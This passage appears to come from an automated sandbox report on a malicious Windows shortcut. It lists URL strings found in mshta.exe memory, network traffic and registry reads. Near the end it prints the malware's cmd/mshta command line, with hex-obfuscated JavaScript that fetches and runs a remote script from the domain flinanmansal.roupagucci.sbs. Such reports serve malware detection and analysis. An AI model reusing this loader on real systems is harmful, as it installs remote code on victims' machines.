Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.x.ai
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.x.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://appleid.cdn-apple.com/appleauth/static/jsapi/appleid/1/en_US/appleid.auth.js
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://business.twitter.com/en/help/troubleshooting/how-twitter-ads-work.html?ref=web-twc-ao-gbl-ad
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://c.tenor.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://caps.twitter.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://caps.x.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cards-frame.twitter.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkoutshopper-live.adyen.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://client-api.arkoselabs.com/
Source: mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cm.g.double
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cm.g.doubleclick.net
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhdsnappytv-vh.akamaihd.net
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dwo3ckksxlb0v.cloudfront.net
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dwo3ckksxlb0v.cloudfront.net;
Source: mshta.exe, 00000003.00000003.2109022379.0000029E8CE9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111510367.0000029E8CE9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2113657541.0000029E8CE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111196582.0000029E8CE92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://flinanmansal.roupagucci.sbs/
Source: mshta.exe, 00000003.00000003.2109022379.0000029E8CE9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111510367.0000029E8CE9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111196582.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2109060769.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2113657541.0000029E8CE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2113604320.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111196582.0000029E8CE92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112859302.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://flinanmansal.roupagucci.sbs/?1/
Source: mshta.exe, 00000003.00000003.2109022379.0000029E8CE9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111510367.0000029E8CE9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2113657541.0000029E8CE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111196582.0000029E8CE92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://flinanmansal.roupagucci.sbs/?1/9?s
Source: mshta.exe, 00000003.00000003.2109022379.0000029E8CE9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111510367.0000029E8CE9A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2113657541.0000029E8CE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2111196582.0000029E8CE92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://flinanmansal.roupagucci.sbs/?1/??u
Source: mshta.exe, 00000003.00000003.2111196582.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2109060769.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2113604320.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112859302.0000029E8CE7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://flinanmansal.roupagucci.sbs/?1/Ztu
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.twitter.com/using-twitter/twitter-supported-browsers
Source: mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iframe.arkos
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://iframe.arkoselabs.com/
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://legal.twitter.com/imprint.html
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://localhost.twitter.com:3443
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://localhost.x.com:3443;
Source: mshta.exe, 00000003.00000002.2113778089.0000029E8CED9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108977142.0000029E8CED9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110887212.0000029E8CED9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://maps.googleapis.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mdhdsnappytv-vh.akamaihd.net
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://media.riffsy.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://media.tenor.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mmdhdsnappytv-vh.akamaihd.net
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mobile.twitter.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mobile.x.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mpdhdsnappytv-vh.akamaihd.net
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pay.twitter.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pay.x.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pdhdsnappytv-vh.akamaihd.net
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://platform-lookaside.fbsbx.com
Source: mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://prod-periscope-profile.s1
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://prod-periscope-profile.s3-us-west-2.amazonaws.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scontent-sea1-1.xx.fbcdn.net
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://scontent.xx.fbcdn.net
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sentry.io
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://static.ads-twitter.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.twitter.com/articles/20170514
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.co/1/i/adsct;
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ton-staging.atla.twitter.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ton-staging.atla.x.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ton-staging.pdxa.twitter.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ton-staging.pdxa.x.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ton.twitter.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ton.x.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/$
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/(
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/i/csp_report?a=O5RXE%3D%3D%3D&ro=false
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/privacy
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F372000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/tos
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upload.twitter.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://upload.x.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vaultjs.apideck.com/
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vmap.grabyo.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vmap.snappytv.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vmaprel.snappytv.com
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://vmapstage.snappytv.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/;
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.periscope.tv
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F313000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F311000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F371000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pscp.tv
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.twitter.com
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F318000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.twitter.com(
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2096343502.000002A68F318000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108977142.0000029E8CEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.twitter.com/
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.twitter.com/0
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.twitter.com/8
Source: mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.twitter.com/H
Source: mshta.exe, 00000003.00000003.2096343502.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2108869400.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2114187780.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2112704093.000002A68F343000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2110781006.000002A68F343000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.twitter.com/x
Source: mshta.exe, 00000003.00000003.2108824952.000002A68F379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://x.com
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownHTTPS traffic detected: 104.21.29.223:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.244.42.65:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.244.42.65:443 -> 192.168.2.6:49701 version: TLS 1.2
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal52.winLNK@4/0@3/2
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c MshtA "JaVAsCrIpT:var _$_WXKH=["\x5a\x53\x46\x4d\113\x38\116","\x73\x63\162\x69\160\164\x3a\x48\x54\x74\x70\x73\x3a\x2f\x2f\x66\x6c\151\x6e\x61\x6e\x6d\x61\x6e\x73\x61\154\56\162\x6f\x75\x70\x61\x67\x75\143\x63\x69\x2e\163\x62\x73\57\x3f\x31\x2f"];try{GetObject(_$_WXKH[1])[_$_WXKH[0]]()}catch(e){};close()"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
